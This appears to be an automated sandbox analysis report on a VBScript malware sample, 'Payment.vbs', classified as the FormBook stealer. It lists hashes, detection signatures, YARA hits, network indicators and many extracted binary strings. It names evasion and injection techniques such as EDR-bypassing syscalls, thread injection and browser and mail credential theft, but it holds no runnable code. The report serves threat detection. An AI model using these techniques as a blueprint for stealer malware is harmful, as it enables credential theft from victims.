Windows Analysis Report
Payment.vbs

Overview

General Information

Sample name:	Payment.vbs
Analysis ID:	1528048
MD5:	de0d7fea05e69a8cf4b7c6071735b141
SHA1:	cc1218cab6f6bccd985a32b443f47ffa2c7bb8b5
SHA256:	1ace0faeac611f4f52e524e7f6ebf4bfd7ca7d1c697427d0828b3368854d9c7c
Tags:	vbsuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected FormBook

AI detected suspicious sample

Bypasses PowerShell execution policy

Connects to a pastebin service (likely for C&C)

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Obfuscated command line found

Queues an APC in another process (thread injection)

Sample has a suspicious name (potential lure to open the executable)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Yara detected FormBook

Source: Yara match	File source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49842 version: TLS 1.2

Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: appidtel.exe, appidtel.exe, 0000000A.00000003.2629248061.0000000003729000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000003.2627277075.000000000357A000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, convert.exe, 00000013.00000003.2729543157.00000000032CB000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2733109530.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.00000000037FE000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.0000000003660000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: appidtel.pdb source: convert.exe, 00000013.00000002.2977602776.0000000003C8C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3537079576.000000000259C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3534781987.000000002F20C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: appidtel.exe, 0000000A.00000003.2629248061.0000000003729000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000003.2627277075.000000000357A000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2729543157.00000000032CB000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2733109530.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.00000000037FE000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.0000000003660000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: convert.pdb source: appidtel.exe, 0000000A.00000002.2727615136.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536147480.0000000001288000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000003.2670887482.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: convert.pdbGCTL source: appidtel.exe, 0000000A.00000002.2727615136.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536147480.0000000001288000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000003.2670887482.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
